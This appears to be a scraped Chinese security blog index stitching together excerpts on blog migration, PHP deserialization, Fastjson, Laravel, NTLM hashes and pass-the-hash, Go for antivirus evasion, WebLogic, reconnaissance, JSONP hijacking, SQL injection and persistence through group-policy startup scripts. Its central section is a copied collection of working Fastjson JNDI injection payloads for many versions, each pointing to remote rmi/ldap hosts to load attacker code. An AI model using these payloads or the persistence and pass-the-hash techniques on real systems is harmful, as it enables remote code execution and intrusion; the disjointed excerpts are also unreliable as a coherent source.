前言

• 要换电脑，迁移下blog，感觉有些东西还是要写出来才有点感觉

git配置

• 环境该下的下载好，blog文件可以直接拖拽到另一台电脑上就行

• 下面就是配置git 的ssh key，连接github blog仓库

• ctf中的php反序列化

前言

• 序列化 即使用serialize();将类的对象的数据用字符串方式进行表示

• 反序列化 即使用unserialize();来读取 序列化格式的数据

使用序列化和反序列化 主要是方便数据的存储和数据的转换读取。

前言

fastjson是alibaba开源的一个json解析库，将java对象和JSON格式字符相互转换。

jackson也有这样类似功能。Spring MVC 默认采用Jackson解析Json

https://github.com/alibaba/fastjson

原理解释：

在请求包里面中发送恶意的json格式payload，漏洞在处理json对象的时候，没有对@type字段进行过滤，从

而导致攻击者可以传入恶意的TemplatesImpl类，而这个类有一个字段就是_bytecodes，有部分函数会根据

这个_bytecodes生成java实例，这就达到fastjson通过字段传入一个类，再通过这个类被生成时执行构造函数。

环境配置

配置环境配了两个小时。。。各种报错

maven环境：http://maven.apache.org/download.cgi

idea 创建maven 项目

1
2
3
4
5
6

pom.xml引入fastjson依赖
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.62</version>
</dependency>

然后处理各种报错

1
2
3
4

pom.xml 加入
<build>
    <defaultGoal>compile</defaultGoal>.
</build>

然后配置tomcat:Apache Tomcat® - Apache Tomcat 9 Software Downloads

Edit Configurations 配置：

然后配置Project Structure ：(28条消息) IDEA出现Please,configure Web Facet first的解决方式，或者是Servlet启动后 404_扶她小藜的博客-CSDN博客_idea please

参考：(28条消息) 在IDEA中创建maven项目，使用Fastjson 介绍json转换_华大哥的博客-CSDN博客_fastjson idea

复现log4j2 的时候也用到了下面两个请求方式

jndi

rmi

Fastjson 多版本payload集合

copy的零组文库

影响版本：

fastjson<=1.2.24

exp：

1

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}

影响版本：

fastjson<=1.2.41

前提：
autoTypeSupport属性为true才能使用。（fastjson>=1.2.25默认为false）

exp：

1

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

影响版本：

fastjson<=1.2.42

前提：
autoTypeSupport属性为true才能使用。（fastjson>=1.2.25默认为false）

exp：

1

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

影响版本：

fastjson<=1.2.43

前提：
autoTypeSupport属性为true才能使用。（fastjson>=1.2.25默认为false）

exp：

1

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

影响版本：

fastjson<=1.2.45

前提：
autoTypeSupport属性为true才能使用。（fastjson>=1.2.25默认为false）

exp：

1

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}

影响版本：

fastjson<=1.2.47

exp：

1
2
3
4
5
6
7
8
9
10
11

{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "ldap://x.x.x.x:1999/Exploit", 
        "autoCommit": true
    }
}

影响版本：

fastjson<=1.2.62

exp：

1

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}"

影响版本：

fastjson<=1.2.66

前提：
autoTypeSupport属性为true才能使用。（fastjson>=1.2.25默认为false）

exp：

1
2
3
4
5
6
7

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {

bypass

浅谈fastjson waf Bypass思路-SecIN (sec-in.com)

参考

safe6Sec/Fastjson: Fastjson姿势技巧集合 (github.com)

https://github.com/alibaba/fastjson

零组文库

前言

Laravel 是一个 Web应用框架，php作为底层语言，能够有很好的扩展，拥有比较完善的软件包。

3大核心：路由，控制器，视图

中文官方：https://learnku.com/docs/laravel/8.x

前言

在winserver2012以后，windows保存的不是明文密码，只会保持密码的hash值

本地用户hash保存在SAM数据库中，域内用户密码hash保存在NTDS.dit文件中

常见格式：

1

Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

AAD3B435B51404EEAAD3B435B51404EE是LM hash 这个是之前认证使用的，现在已经不使用了

31D6CFE0D16AE931B73C59D7E0C089C0是NTLM hash

在域环境中，机器认证是利用kerberos协议，在内网渗透中，域环境中拿到普通域用户/域管 hash，可以尝试pth。

在工作组环境中如果两台机器如果本地administrator账号密码一样也可能可以pth。

Go 语言被设计成一门应用于搭载 Web 服务器，存储集群或类似用途的巨型中央服务器的系统编程语言。

目的：

学习go写脚本和 免杀（其他大佬的有些免杀也是用go写的，效果不错，也算是为了能看懂代码吧）

go 没有类，有结构体，有指针，（主要是利用函数）。

Weblogic

默认端口：7001

部分历史漏洞

1
2
3
4
5
6
7

1. 弱口令/任意文件读取+后台war包/任意文件上传getshell
2. CVE-2017-20271
3. CVE-2018-2628
4. CVE-2019-2725
5. CVE-2020-2555
6. CVE-2021-2394

WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

WebLogic Server具有开发和部署关键任务电子商务Web应用系统 所需的多种特色和优势。

参考

本文参考：https://github.com/Qftm/Information_Collection_Handbook

参考：史上最全的子域名搜集方法（证书透明度/DNS记录/威胁情报/代码仓库/dns暴力破解/各种细节） - BIGHAMMERS - 博客园 (cnblogs.com)

域名信息

查询域名是否已经被注册，以及注册域名和注册人的详细信息

whois查询

• 站长之家：http://whois.chinaz.com/
• 国外： https://www.whois.com/
• 腾讯云： https://whois.cloud.tencent.com/domain?domain=

同源策略

同协议同域名同端口的网站才能进行资源的获取和共享。

jsonp 劫持

JSONP劫持漏洞学习笔记(待补充) – 天下大木头 (wjlshare.com)

利用<script>标签

core

利用Origin头

sql

简单来说就是传参过滤不严谨照成sql语句的拼接

1
2

$id  = $_GET['id'];
$sql = "SELECT name FROM users WHERE id = $id";

常见数据库注入 | (shmilying.tk)

组策略

本地组策略 LGP

简称（Local Group Policy或者Local GPO）

win+R键打开运行，输入“gpedit.msc”

添加对应脚本即可

或者将文件直接放入C:\Windows\System32\GroupPolicy\Machine\Scripts\Startup 路径下 （可以开机自启）

通常用来权限维持